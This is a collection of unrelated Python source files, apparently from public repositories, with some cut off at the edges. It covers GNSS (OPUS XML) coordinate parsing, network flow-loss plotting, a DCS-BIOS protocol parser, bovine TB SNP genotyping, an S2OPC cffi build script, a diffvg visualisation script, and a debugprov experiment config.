used (int array) : array of observations [total, used]
fixed (int array) : array of observation ambiguities [total, fixed]
"""
quality = self.root.find('DATA_QUALITY')
ureg = pint.UnitRegistry()
accuracy_lat = float(quality.find('ACCURACY/LAT').text) * ureg(quality.find('ACCURACY').get('UNIT'))
accuracy_long = float(quality.find('ACCURACY/LONG').text) * ureg(quality.find('ACCURACY').get('UNIT'))
accuracy_el_height = float(quality.find('ACCURACY/EL_HEIGHT').text) * ureg(quality.find('ACCURACY').get('UNIT'))
accuracy_src = [accuracy_long, accuracy_lat, accuracy_el_height]
accuracy = [c.to(unit) for c in accuracy_src]
rms_src = float(quality.find('RMS').text) * ureg(quality.find('RMS').get('UNIT'))
rms = rms_src.to(unit)
used = [int(quality.find('PERCENT_OBS_USED').get('TOTAL')), int(quality.find('PERCENT_OBS_USED').get('USED'))]
fixed = [int(quality.find('PERCENT_AMB_FIXED').get('TOTAL')), int(quality.find('PERCENT_AMB_FIXED').get('FIXED'))]
return accuracy, rms, used, fixed
def plane_coords(
self,
system: str = 'UTM',
unit: str = 'm'
) -> list[float]:
"""
Extract the coordinate from an OPUS XML file PLANE_COORD_SPEC elements, and return it in the desired units and coordinate spec type.
Parameters
----------
system (str) : coordinate projection of the returned coordinate, valid values are 'UTM' or 'SPC'.
unit (str) : distance units of the returned coordinate, valid values are 'm', 'ft' or 'sft'.
Returns
-------
coords (float Quantity array) : x,y,z coordinates as array of pint Quantity.
"""
ureg = pint.UnitRegistry()
try:
pcs = self.root.find('PLANE_COORD_INFO/PLANE_COORD_SPEC[@TYPE="{}"]'.format(system))
except:
logger.error("Unable to find a {} position".format(system))
e_src = float(pcs.find('EASTING').text) * ureg(pcs.find('EASTING').get('UNIT'))
n_src = float(pcs.find('NORTHING').text) * ureg(pcs.find('NORTHING').get('UNIT'))
h_src = float(self.root.find('ORTHO_HGT').text) * ureg(self.root.find('ORTHO_HGT').get('UNIT'))
coords_src = [e_src, n_src, h_src]
coords = [c.to(unit) for c in coords_src]
return coords
def position(
self,
system='LLA',
ref_frame='NAD_83(2011)',
unit='m'
) -> list[float]:
"""
Extract the coordinate from an OPUS XML file POSITION elements, and return it in the desired units and coordinate spec type.
Parameters
----------
system (str) : coordinate projection of the returned coordinate, valid values are 'LLA', 'LLH', or 'XYZ'.
ref_frame (str) : the reference frame to select, OPUS currently offers NAD_83(2011) and IGS08.
unit (str) : distance units of the returned coordinate, valid values are 'm', 'ft' or 'sft'.
Returns
-------
coords (float Quantity array) : array of pint Quantity containing ellipsoidal coordinates (LLA or LLH), or rectilinear XYZ coordinates.
"""
ureg = pint.UnitRegistry()
try:
position = self.root.find('POSITION[REF_FRAME="{}"]'.format(ref_frame))
except:
logger.error("Unable to find a position with reference frame: {}".format(ref_frame))
if system in ['LLA', 'LLH']:
lat_d = int(position.find('COORD_SET/ELLIP_COORD/LAT/DEGREES').text) * ureg('arcdeg')
lat_m = int(position.find('COORD_SET/ELLIP_COORD/LAT/MINUTES').text) * ureg('arcmin')
lat_s = float(position.find('COORD_SET/ELLIP_COORD/LAT/SECONDS').text) * ureg('arcsec')
lon_d = int(position.find('COORD_SET/ELLIP_COORD/EAST_LONG/DEGREES').text) * ureg('arcdeg')
lon_m = int(position.find('COORD_SET/ELLIP_COORD/EAST_LONG/MINUTES').text) * ureg('arcmin')
lon_s = float(position.find('COORD_SET/ELLIP_COORD/EAST_LONG/SECONDS').text) * ureg('arcsec')
lat = lat_d + lat_m + lat_s
lon = lon_d + lon_m + lon_s
if lon.magnitude > 180:
lon = lon - 360 * ureg('arcdeg')
if system == 'LLA':
h_src = float(position.find('COORD_SET/ELLIP_COORD/EL_HEIGHT').text) * ureg(position.find('COORD_SET/ELLIP_COORD/EL_HEIGHT').get('UNIT'))
elif system == 'LLH':
h_src = float(self.root.find('ORTHO_HGT').text) * ureg(self.root.find('ORTHO_HGT').get('UNIT'))
h = h_src.to(unit)
return [lon, lat, h]
elif system == 'XYZ':
X = float(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="X"]').text) * ureg(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="X"]').get('UNIT'))
Y = float(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="Y"]').text) * ureg(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="Y"]').get('UNIT'))
Z = float(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="Z"]').text) * ureg(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="Z"]').get('UNIT'))
coords_src = [X, Y, Z]
coords = [c.to(unit) for c in coords_src]
return coords
else:
logger.error("{} is not an accepted value for system".format(system))
raise
def ref_frames(self) -> str:
ref_frames = self.root.xpath('//REF_FRAME/text()')
return ref_frames
|
<reponame>openalto/network-simulator-data<gh_stars>0
#!/usr/bin/env python3
# import csv
import sys
# from sfp_eval.draw_bin.flow_loss_stat import Result
import numpy as np
import matplotlib.pyplot as plt
def generate_plots(data, filename):
N = 3
# drop_cgfp_vec= [0.11501636056812128, 0.20516286710563422, 0.23843457787048516]
# drop_cgc_vec= [0.6183041409470778, 0.6493825060540817, 0.6777975228622714]
# drop_sfp_vec= [0, 0, 0]
drop_cbgp_flow= 100*np.array([112558, 144199, 213338])/223403
drop_fbgp_flow= 100*np.array([0, 0, 0])
drop_sfp_flow= 100*np.array([0, 0, 0])
drop_cbgp_vol= 100*np.array([372723424501441, 476423418691906, 693306747619368])/726039461241118
drop_fbgp_vol= 100*np.array([0, 0, 0])
drop_sfp_vol= 100*np.array([0, 0, 0])
# drop_vol_vec = (data['CGFP-BGP'].drop_volume_ratio(), data['CGC-BGP'].drop_volume_ratio(), data['SFP'].drop_volume_ratio())
ind = np.arange(N)
width = 0.1
# plt.rc('font', family='sans-serif', weight='bold', size=10)
fig, ax = plt.subplots()
fig.subplots_adjust(bottom=0.15)
rect1 = ax.bar(ind, drop_cbgp_flow, width, color='r', label='C-BGP (Flows)')
# rect3 = ax.bar(ind+2*width, drop_fbgp_flow, width, color='c', label='F-BGP (Flows)')
rect5 = ax.bar(ind+2*width, drop_sfp_flow, width, color='m', label='SFP (Flows)')
rect2 = ax.bar(ind+width, drop_cbgp_vol, width, color='g', label='C-BGP (Volume)')
# rect4 = ax.bar(ind+3*width, drop_fbgp_vol, width, color='y', label='F-BGP (Volume)')
rect6 = ax.bar(ind+3*width, drop_sfp_vol, width, color='b', label='SFP (Volume)')
ax.set_ylabel('Fraction of failed flows/volume (%)', fontsize=14)
# ax.set_title('Loss when deflect traffic between neighboring peers')
ax.set_xticks(ind + 1.5*width)
ax.set_xticklabels(('1', '3', '5'))
# ax.set_xlabel('number of peers applied the deflection policies')
ax.set_xlabel('Number of networks applied the fine-grained block policies', fontsize=14)
# ax.legend((rect1[0], rect2[0], rect3[0]), ("F-BGP" ,"C-BGP", "SFP"))
ax.legend(ncol=2)
# plt.show()
fig.set_size_inches(6.4, 3.8)
fig.savefig(filename)
if __name__ == '__main__':
filename = sys.argv[1]
# final = {i: {
# 'CGFP-BGP': Result(),
# 'CGC-BGP': Result(),
# 'SFP': Result(),
# 'SFP on CGC-BGP Reachable Flows': Result()
# } for i in [1, 3, 5]}
final = {}
# for i in [1, 3, 5]:
# with open(filename + '-%d.csv' % i) as f:
# reader = csv.reader(f, delimiter='\t')
# count = 0
# for row in reader:
# if count % 4 == 0:
# obj = final[i]['CGFP-BGP'] # type: Result
# elif count % 4 == 1:
# obj = final[i]['CGC-BGP'] # type: Result
# elif count % 4 == 2:
# obj = final[i]['SFP'] # type: Result
# else:
# obj = final[i]['SFP on CGC-BGP Reachable Flows']
# count += 1
# obj.merge(Result(row))
generate_plots(final, filename+".pdf")
|
<gh_stars>1-10
from __future__ import print_function
from __future__ import unicode_literals
import sys
if sys.version_info[0] == 2: # python 2.x
def byte2int(b):
return ord(b)
else:
def byte2int(b):
return b[0]
import struct
class ProtocolParser:
def __init__(self):
self.__state = "WAIT_FOR_SYNC"
self.__sync_byte_count = 0
self.__address = 0
self.__count = 0
self.__data = 0
self.write_callbacks = set()
self.frame_sync_callbacks = set()
def processByte(self, c):
c = byte2int(c)
if self.__state == "ADDRESS_LOW":
self.__address = c
self.__state = "ADDRESS_HIGH"
elif self.__state == "ADDRESS_HIGH":
self.__address += c*256
if self.__address != 0x5555:
self.__state = "COUNT_LOW"
else:
self.__state = "WAIT_FOR_SYNC"
elif self.__state == "COUNT_LOW":
self.__count = c
self.__state = "COUNT_HIGH"
elif self.__state == "COUNT_HIGH":
self.__count += 256*c
self.__state = "DATA_LOW"
elif self.__state == "DATA_LOW":
self.__data = c
self.__count -= 1
self.__state = "DATA_HIGH"
elif self.__state == "DATA_HIGH":
self.__data += 256*c
self.__count -= 1
for callback in self.write_callbacks:
callback(self.__address, self.__data)
self.__address += 2
if self.__count == 0:
self.__state = "ADDRESS_LOW"
else:
self.__state = "DATA_LOW"
if c == 0x55:
self.__sync_byte_count += 1
else:
self.__sync_byte_count = 0
if self.__sync_byte_count == 4:
self.__state = "ADDRESS_LOW"
self.__sync_byte_count = 0
for callback in self.frame_sync_callbacks:
callback()
class StringBuffer:
def __init__(self, parser, address, length, callback):
self.__address = address
self.__length = length
self.__dirty = False
self.buffer = bytearray(length)
self.callbacks = set()
if callback:
self.callbacks.add(callback)
parser.write_callbacks.add(lambda address, data: self.on_dcsbios_write(address, data))
def set_char(self, i, c):
if self.buffer[i] != c:
self.buffer[i] = c
self.__dirty = True
def on_dcsbios_write(self, address, data):
if address >= self.__address and self.__address + self.__length > address:
data_bytes = struct.pack("<H", data)
self.set_char(address - self.__address, data_bytes[0])
if self.__address + self.__length > (address+1):
self.set_char(address - self.__address + 1, data_bytes[1])
if address == 0xfffe and self.__dirty:
self.__dirty = False
s = self.buffer.split(b"\x00")[0].decode("latin-1")
for callback in self.callbacks:
callback(s)
class IntegerBuffer:
def __init__(self, parser, address, mask, shift_by, callback):
self.__address = address
self.__mask = mask
self.__shift_by = shift_by
self.__value = None
self.callbacks = set()
if callback:
self.callbacks.add(callback)
parser.write_callbacks.add(lambda address, data: self.on_dcsbios_write(address, data))
def on_dcsbios_write(self, address, data):
if address == self.__address:
value = (data & self.__mask) >> self.__shift_by
if self.__value != value:
self.__value = value
for callback in self.callbacks:
callback(value)
|
import csv, pickle, operator, os, sys
import collections
from functools import reduce
# parsing the arguments
args=sys.argv
if len(args)<2:
pathTBRuns=(os.path.dirname(os.getcwd()))
instats="*.csv"
pathPatterns="/home/richard/MyScripts/BovTB-nf/references/Stage1_patterns"
refName="Mycbovis-2122-97_LT708304.fas"
TBRun ="test"
qth=8
thMinGoodCov=2
thCovProp=0.2
thqualsnp=150
thqualnonsnp=0
strainVCF="*.vcf"
else:
pathTBRuns=(os.path.dirname(os.getcwd()))
instats=sys.argv[1]
pathPatterns=sys.argv[2]
refName=sys.argv[3]
TBRun=sys.argv[4]
qth=int(sys.argv[5])
thMinGoodCov=int(sys.argv[6])
thCovProp=float(sys.argv[7])
thqualsnp=int(sys.argv[8])
thqualnonsnp=int(sys.argv[9])
strainVCF=sys.argv[10]
patternsDetailsFile="CSSnewclusters_LT708304_230119.csv" #"CSSnewclusters_181115.csv" #"patterns20131220.csv" "CSSnewclusters_LT708304_181217.csv"
patternsBritishBTBFile="patternsBritishBTB_LT708304.csv"
patternsPinnipediiFile="patternsPinnipedii_LT708304.csv"
patternsMic_PinFile="patternsMic_Pin_LT708304.csv"
patternsMicrotiFile="patternsMicroti_LT708304.csv"
patternsBTBFile="patternsBTB_LT708304.csv"
# reads a csv file
# return a list where each element is a list containing the element of a row.
def readTable(fname,ch):
infile=open(fname,"r")
data = csv.reader(infile, delimiter=ch)
dataOut = [row for row in data]
infile.close()
return dataOut
# writes a list into a csv file
# each element in the list is written as a row in the csv file
def writeCSV(fname,matrix):
with open(fname, "w") as fileOut:
writer = csv.writer(fileOut)
writer.writerows(matrix)
print("file "+fname+" saved.")
# transposes a python list
def listT(matrix):
zipped = zip(*matrix)
output = [list(item) for item in zipped]
return output
# compares a strain gSS base calls (strpat) to the a genotype group pattern give by groPat
# strPat is the reference patern.
# it returns two values, a list with the percentage of matches (M), mismatches (MM), notCovered (N) and anomalous (A).
# The second list is a vector with the same length as strPat with Ms, MMs,Ns and As as corresponding.
#This part does the matching - finds the closest reference SNP combination on a per sample basis
def comparePatterns(refPat,strPat,groPat):
lenPat=len(refPat)
if lenPat!=len(strPat) or lenPat!=len(groPat):
print("Different values refPat,strPat,groPat: "+str(lenPat)+" "+str(len(strPat))+" "+str(len(groPat)))
res=[]
for i in range(lenPat):
if strPat[i].upper()=="N":
res.append("N")
else:
if strPat[i].upper() not in ['A','C','G','T']:
res.append("A")
else:
if strPat[i].upper()==groPat[i]:
res.append("M")
else:
if strPat[i].upper()==refPat[i] or groPat[i]==refPat[i]:
res.append("MM")
else:
res.append("A")
counts=collections.Counter(res)
counts=[round(100*float(counts['M'])/lenPat,2),round(100*float(counts['MM'])/lenPat,2),round(100*float(counts['N'])/lenPat,2),round(100*float(counts['A'])/lenPat,2)]
return [counts,res]
#this is the key part that runs the per sample stage1 genotyping
def findGenotypeOneSample(strainsDetailsTittle,strainDetails,pathTBRuns,patternsDetails,patternsBritishBTBDetails,patternsBTBDetails,patternsMic_PinDetails,patternsMicrotiDetails,patternsPinnipediiDetails,refName,qth,pathAux,thMinGoodCov,thCovProp,thqualsnp,thqualnonsnp):
pmeanCov=strainsDetailsTittle.index('MeanDepth')
pfileName=strainsDetailsTittle.index('Sample')
name=[strainDetails[pfileName]]
meanCov=float(strainDetails[pmeanCov])
strainStatsFileName=strainDetails[pfileName]+".pileup.vcf"
posToExtract=map(int,patternsDetails[0][1:])
posToExtractBritishBTB=map(int,patternsBritishBTBDetails[0][1:])
posToExtractBTB=map(int,patternsBTBDetails[0][1:])
posToExtractMic_Pin=map(int,patternsMic_PinDetails[0][1:])
posToExtractMicroti=map(int,patternsMicrotiDetails[0][1:])
posToExtractPinnipedii=map(int,patternsPinnipediiDetails[0][1:])
# change flags in this section
# If the match to the first reference dataset is above a given threshold the process moves to the next
# This is iterated depending on the outcomes
[strainGSSInfo,strainGSSBritishBTBInfo,strainGSSBTBInfo,strainGSSMic_PinInfo,strainGSSMicrotiInfo,strainGSSPinnipediiInfo]=getSnpsStatsStrain(strainStatsFileName,[posToExtract,posToExtractBritishBTB,posToExtractBTB,posToExtractMic_Pin,posToExtractMicroti,posToExtractPinnipedii],pathAux,thMinGoodCov,thCovProp,thqualsnp,thqualnonsnp)
if meanCov >=qth:
BTB=getBestMatchPattern(patternsBTBDetails,strainGSSBTBInfo)[0]
if BTB[0]=="bTB" and BTB[2]>=70:
flag="bTB"
BritishBTB=getBestMatchPattern(patternsBritishBTBDetails,strainGSSBritishBTBInfo)[0]
if BritishBTB[0]=="BritishbTB" and BritishBTB[2]>=70:
flag="BritishbTB"
else:
flag="nonBritishbTB"
[maxPat,strainQ]=getBestMatchPattern(patternsDetails,strainGSSInfo)
maxPat=strainDetails+[flag]+maxPat
strainQ=[name]+strainQ
return [maxPat,strainQ]
else:
Mic_Pin=getBestMatchPattern(patternsMic_PinDetails,strainGSSMic_PinInfo)[0]
if Mic_Pin[0]=="MicPin" and Mic_Pin[2]>=70:
Microti=getBestMatchPattern(patternsMicrotiDetails,strainGSSMicrotiInfo)[0]
if Microti[0]=="Microti" and Microti[2]>=70:
flag="Microti"
maxPat=strainDetails+[flag]+Microti
return [maxPat,"NA"]
else:
Pinnipedii=getBestMatchPattern(patternsPinnipediiDetails,strainGSSPinnipediiInfo)[0]
if Pinnipedii[0]=="Pinnipedii" and Pinnipedii[2]>=70:
flag="Pinnipedii"
maxPat=strainDetails+[flag]+Pinnipedii
print(maxPat)
return [maxPat,"NA"]
else:
flag="MicPin"
maxPat=strainDetails+[flag]+Mic_Pin
return [maxPat,"NA"]
else:
flag="nonbTB"
maxPat=strainDetails+[flag]+BTB
return [maxPat,"NA"]
else:
flag="LowCoverage"
maxPat=strainDetails+[flag]+6*["NA"]
print(maxPat)
return [maxPat,"NA"]
def getSnpsStatsStrain(strainStatsFileName,listas,pathAux,thMinGoodCov,thCovProp,thqualsnp,thqualnonsnp):
print("loading "+ strainStatsFileName)
fileIn = open(strainVCF, 'r')
csv=fileIn.readlines()
fileIn.close()
csv=dict([(t.split()[1],t.split()) for t in csv if t[0]!="#" and "INDEL" not in t])
listasOut=[]
for lista in listas:
out=[]
for i in lista:
nu=[i,"n","NA","NA","NA","NA","NA","NA"]
try:
line=csv[str(i)]
except:
out=out+[nu]
continue
ref=line[3]
if line[4]==".":
alt=line[3]
else:
alt=line[4]
qual=float(line[5])
det=line[7].split(";")
if "DP4=" in line[7]:
call="n"
gcovRF,gcovRR,gcovAF,gcovAR=map(int,[s for s in det if "DP4=" in s][0].split("DP4=")[1].split(","))
if ref.upper() in ["A","C","G","T"] and alt.upper() in ["A","C","G","T"]:
if gcovRF+gcovAF>0 and gcovRR+gcovAR>0:
if ref.upper()==alt.upper() and qual>thqualnonsnp and gcovRF+gcovRR>thMinGoodCov and float(gcovAF)/(gcovRF+gcovAF)<thCovProp and float(gcovAR)/(gcovRR+gcovAR)<thCovProp:
call=ref.upper()
if ref.upper()!=alt.upper() and qual>thqualsnp and gcovAF+gcovAR>thMinGoodCov and float(gcovRF)/(gcovRF+gcovAF)<thCovProp and float(gcovRR)/(gcovRR+gcovAR)<thCovProp:
call=alt.upper()
nu=[i,call,qual,gcovRF+gcovRR+gcovAF+gcovAR,gcovRF,gcovRR,gcovAF,gcovAR]
out=out+[nu]
listasOut=listasOut+[out]
print("snps Extracted in lists of length:")
itemLen = [len(item) for item in listasOut]
print(itemLen)
os.system("rm "+strainVCF)
return listasOut
def isACGT(c):
return c.upper() in ["A","C","G","T"]
def readTVSFile(fname):
fileIn = open(fname, 'rb')
data = csv.reader(fileIn)
dataOut = [row for row in data]
fileIn.close()
return dataOut
def getBestMatchPattern(patternsDetails,strainGSSInfo):
print("matching positions:")
hal=[int(x) for x in patternsDetails[0][1:]]==[x[0] for x in strainGSSInfo]
if hal==False:sys.exit("matching positions is false")
strainGSS=[x[1] for x in strainGSSInfo]
refPat=patternsDetails[2][1:]
maxVal=0
maxPat=[]
maxgroPat=[]
maxgroRes=[]
for pattern in patternsDetails[3:]:
groPat=pattern[1:]
groRes=comparePatterns(refPat,strainGSS,groPat)
comp=[pattern[0],len(groPat)]+groRes[0]
if comp[2]>=maxVal:
maxVal=comp[2]
maxPat=comp
maxgroPat=groPat
maxgroRes=groRes
if maxPat==[]:
maxPat=comp
maxgroPat=groPat
maxgroRes=groRes
strainQ=[[maxPat[0]]]+[maxPat[1:]]+[reduce(operator.add,[[y],[z],[x[1]],x[2:]]) for y,x,z in zip(maxgroPat,strainGSSInfo,maxgroRes[1])]
return [maxPat,strainQ]
print(TBRun)
refName=refName.split(".")[0]
strainDetailsFile=instats
pathResutls=os.path.join(TBRun,"Stage1")
if not os.path.exists(pathResutls): os.makedirs(pathResutls)
pathAux=os.path.join(pathResutls,"Aux")
if not os.path.exists(pathAux): os.system("mkdir "+ pathAux)
strainsInfo=readTable(strainDetailsFile,',')
pfileName=strainsInfo[0].index('Sample')
pmeanCov=strainsInfo[0].index('MeanDepth')
ppermap=strainsInfo[0].index('%Mapped')
totalReads=strainsInfo[0].index('NumRawReads')
genomeCov=strainsInfo[0].index('GenomeCov')
outcome=strainsInfo[0].index('Outcome')
strainsInfo=listT(strainsInfo)
strainsDetails=listT([strainsInfo[pfileName][1:],strainsInfo[genomeCov][1:],strainsInfo[pmeanCov][1:],strainsInfo[totalReads][1:],strainsInfo[ppermap][1:],strainsInfo[outcome][1:]])
strainsDetails=[['Sample','GenomeCov','MeanDepth','NumRawReads','pcMapped','Outcome',]]+strainsDetails
print("Processing "+ str(len(strainsDetails))+" samples")
patternsDetails=listT(readTable(os.path.join(pathPatterns,patternsDetailsFile),","))
patternsBritishBTBDetails=listT(readTable(os.path.join(pathPatterns,patternsBritishBTBFile),","))
patternsPinnipediiDetails=listT(readTable(os.path.join(pathPatterns,patternsPinnipediiFile),","))
patternsMic_PinDetails=listT(readTable(os.path.join(pathPatterns,patternsMic_PinFile),","))
patternsMicrotiDetails=listT(readTable(os.path.join(pathPatterns,patternsMicrotiFile),","))
patternsBTBDetails=listT(readTable(os.path.join(pathPatterns,patternsBTBFile),","))
maxPats=[strainsDetails[0]+["flag","group","CSSTested","matches","mismatches","noCoverage","anomalous"]]
maxPatsQ=[[[patternsDetails[0][0]]]+[["PredGenotype"],["M-MM-N-A"]]+[[x] for x in patternsDetails[0][1:]],[[patternsDetails[1][0]]]+[[""],[""]]+[[x] for x in patternsDetails[1][1:]],[[patternsDetails[2][0]]]+[[""],[""]]+[[x] for x in patternsDetails[2][1:]]]
outFileName="_stage1.csv"
for strainDetails in strainsDetails[1:]:
print(strainDetails)
[maxPat,strainQ]=findGenotypeOneSample(strainsDetails[0],strainDetails,pathTBRuns,patternsDetails,patternsBritishBTBDetails,patternsBTBDetails,patternsMic_PinDetails,patternsMicrotiDetails,patternsPinnipediiDetails,refName,qth,pathAux,thMinGoodCov,thCovProp,thqualsnp,thqualnonsnp)
maxPats=maxPats+[maxPat]
if strainQ!="NA":
maxPatsQ=maxPatsQ+[strainQ]
os.system("rm -R "+pathAux)
writeCSV(outFileName,maxPats)
maxPats=[maxPats[0]]+sorted(maxPats[1:],key=lambda x: x[0])
writeCSV(outFileName,maxPats)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Licensed to Systerel under one or more contributor license
# agreements. See the NOTICE file distributed with this work
# for additional information regarding copyright ownership.
# Systerel licenses this file to you under the Apache
# License, Version 2.0 (the "License"); you may not use this
# file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from cffi import FFI
import os
ffibuilder = FFI()
# TODO: generate this file
header = open('./s2opc_expanded.h').read()
ffibuilder.cdef(header + r'''
# 1 "cffi-cdef"
/* Python callbacks that are callable from C */
extern "Python"
{
void _callback_log(SOPC_Log_Level log_level, SOPC_LibSub_CstString text);
void _callback_disconnected(SOPC_LibSub_ConnectionId c_id);
void _callback_datachanged(SOPC_LibSub_ConnectionId c_id, SOPC_LibSub_DataId d_id, SOPC_LibSub_Value* value);
void _callback_client_event(SOPC_LibSub_ConnectionId c_id, SOPC_LibSub_ApplicativeEvent event, SOPC_StatusCode status, const void* response, uintptr_t responseContext);
void _callback_toolkit_event(SOPC_App_Com_Event event, uint32_t IdOrStatus, void* param, uintptr_t appContext);
void _callback_address_space_event(const SOPC_CallContext* callCtxPtr, SOPC_App_AddSpace_Event event, void* opParam, SOPC_StatusCode opStatus);
SOPC_ReturnStatus _callback_validate_user_identity(SOPC_UserAuthentication_Manager* authenticationManager,
const SOPC_ExtensionObject* pUser,
SOPC_UserAuthentication_Status* pUserAuthenticated);
SOPC_ReturnStatus _callback_authorize_operation(SOPC_UserAuthorization_Manager* authorizationManager,
SOPC_UserAuthorization_OperationType operationType,
const SOPC_NodeId* nodeId,
uint32_t attributeId,
const SOPC_User* pUser,
bool* pbOperationAuthorized);
}
void SOPC_DataValue_Delete(SOPC_DataValue *datavalue);
''')
source = r'''
#include "s2opc_expanded.h"
const char* SOPC_SecurityPolicy_None_URI = "http://opcfoundation.org/UA/SecurityPolicy#None";
const char* SOPC_SecurityPolicy_Basic128Rsa15 = "http://opcfoundation.org/UA/SecurityPolicy#Basic128Rsa15";
const char* SOPC_SecurityPolicy_Basic256_URI = "http://opcfoundation.org/UA/SecurityPolicy#Basic256";
const char* SOPC_SecurityPolicy_Basic256Sha256_URI = "http://opcfoundation.org/UA/SecurityPolicy#Basic256Sha256";
const uint8_t SOPC_SecurityMode_None_Mask = 0x01;
const uint8_t SOPC_SecurityMode_Sign_Mask = 0x02;
const uint8_t SOPC_SecurityMode_SignAndEncrypt_Mask = 0x04;
const uint8_t SOPC_SecurityMode_Any_Mask = 0x07;
const uint8_t SOPC_MaxSecuPolicies_CFG = 5;
void SOPC_DataValue_Delete(SOPC_DataValue *datavalue)
{
SOPC_DataValue_Clear(datavalue);
free(datavalue);
}
'''
# It (is said to) produces faster code with set_source, and checks what it can on the types.
# However, it requires a gcc.
# The other way, dlopen, loads the ABI, is less safe, slower, but only requires the .so/.dll
# TODO: automatize configuration
if os.name == 'nt':
# Windows
ffibuilder.set_source('_pys2opc',
source,
extra_link_args=['Advapi32.lib', 'ws2_32.lib', 's2opc_clientserver-xml-loaders-expat.lib', 's2opc_clientwrapper.lib', 's2opc_clientserver.lib', 's2opc_common.lib', 'mbedcrypto.lib', 'mbedtls.lib', 'mbedx509.lib', 'libexpat.lib'],
include_dirs=['.'],
library_dirs=['../lib', # working dir should be located in build dir
'.'], # Ease compilation outside of the S2OPC project
)
else:
# Linux
ffibuilder.set_source('_pys2opc',
source,
extra_link_args=['-ls2opc_clientserver-xml-loaders-expat', '-ls2opc_clientwrapper', '-ls2opc_clientserver', '-ls2opc_common', '-lmbedcrypto', '-lmbedtls', '-lmbedx509', '-lexpat'],
include_dirs=['.'],
library_dirs=['../lib', # working dir should be located in build dir
'.'], # Ease compilation outside of the S2OPC project
)
if __name__ == '__main__':
ffibuilder.compile(tmpdir='out')
|
<reponame>13952522076/diffvg
"""
CUDA_VISIBLE_DEVICES=0 python visualize.py --model ResNetAE --msg demo1 --image ../data/emoji_rgb/train/0/240px-Emoji_u1f60d.svg.png
"""
import argparse
import os
import datetime
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
from torchvision import transforms
import models as models
from PIL import Image
from helper import mkdir_p
def parse_args():
"""Parameters"""
parser = argparse.ArgumentParser('training')
parser.add_argument('-c', '--checkpoint', type=str, metavar='PATH',
help='path to save checkpoint (default: checkpoint)')
parser.add_argument('--msg', type=str, help='message after checkpoint')
parser.add_argument('--model', default='RealAE', help='model name [default: pointnet_cls]')
parser.add_argument('--image', type=str, help='the test image')
parser.add_argument('--which', type=str, default="best", choices=["best", "last", "none"])
# training
parser.add_argument('--loss', default='l2')
# models
# imsize = 28, paths = 4, segments = 5, samples = 2, zdim = 1024, stroke_width = None
parser.add_argument('--imsize', default=224, type=int)
parser.add_argument('--paths', default=128, type=int)
parser.add_argument('--segments', default=3, type=int)
parser.add_argument('--samples', default=2, type=int)
parser.add_argument('--zdim', default=2048, type=int)
parser.add_argument('--max_width', default=2, type=int)
parser.add_argument('--pretained_encoder', dest='pretained_encoder', action='store_true')
return parser.parse_args()
args = parse_args()
os.environ["HDF5_USE_FILE_LOCKING"] = "FALSE"
# Verbose operations: make folder, init logger, fix seed, set device
time_str = str(datetime.datetime.now().strftime('-%Y%m%d%H%M%S'))
message = time_str if args.msg is None else "-" + args.msg
args.checkpoint = 'checkpoints/' + args.model + message
args.visualize = 'checkpoints/' + args.model + message + '/test'
if not os.path.isdir(args.visualize):
mkdir_p(args.visualize)
def main():
device = 'cuda' if torch.cuda.is_available() else 'cpu'
print(f'==> using device: {device}')
print(f"==> args: {args}")
# building models
print(f'==> Building model: {args.model}')
net = models.__dict__[args.model](
imsize=args.imsize, paths=args.paths, segments=args.segments, samples=args.samples,
zdim=args.zdim, pretained_encoder=args.pretained_encoder)
if args.loss == 'l1':
criterion = nn.L1Loss().to(device)
print(f"==> Using criterion L1 loss.")
else:
criterion = nn.MSELoss().to(device)
print(f"==> Using criterion MSE loss.")
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
if args.which == "none":
print("!!! Loading no checkpoint, the output is random.!!!")
else:
which_checkpoint = args.which + "_checkpoint.pth"
print(f"==> loading {which_checkpoint} from {args.checkpoint}")
checkpoint_path = os.path.join(args.checkpoint, "last_checkpoint.pth")
checkpoint = torch.load(checkpoint_path)
net.load_state_dict(checkpoint['net'])
print('==> Preparing data..')
test_transform = transforms.Compose([
transforms.Resize((args.imsize, args.imsize)),
transforms.ToTensor()
])
data = Image.open(args.image)
data = test_transform(data)
data.unsqueeze_(0)
data = data.to(device)
net.eval()
basename = os.path.basename(args.image)
filename = os.path.splitext(basename)[0]
print(f"basename is {basename}, filename is{filename}")
with torch.no_grad():
out = net(data)
loss = criterion(data, out)
loss = str("%.6f" % (loss))
inputpath = os.path.join(args.visualize, f"{filename}_input.png")
svgpath = os.path.join(args.visualize, f"{filename}_loss{loss}_svg.svg")
renderpath = os.path.join(args.visualize, f"{filename}_loss{loss}_render.png")
net.module.visualize(data, inputpath=inputpath, svgpath=svgpath, renderpath=renderpath)
print(f"Finish visualization.")
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# coding: utf-8
# Experiment Configs
from debugprov.validity import Validity
from debugprov.divide_and_query import DivideAndQuery
from debugprov.single_stepping import SingleStepping
from debugprov.visualization import Visualization
from debugprov.heaviest_first import HeaviestFirst
from debugprov.top_down import TopDown
from debugprov.execution_tree_creator import ExecTreeCreator
from debugprov.provenance_enhancement import ProvenanceEnhancement
from debugprov.node import Node
from datetime import datetime
from graphviz import Graph
import time
import sqlite3
GENERATE_TREES = False
RUN_1ST_EXPERIMENT = True
RUN_2ND_EXPERIMENT = False
RUN_3RD_EXPERIMENT = True
# Imports
subjects = [
'experiments/selected_mutants/bisection.mutant.19', # 02-bisection
'experiments/selected_mutants/bisection.mutant.108', # 02-bisection
'experiments/selected_mutants/intersection.mutant.81', # 03-intersection
'experiments/selected_mutants/lu_decomposition.mutant.84', # 04-lu_decomposition
'experiments/selected_mutants/newton_method.mutant.35', # 05-newton_method
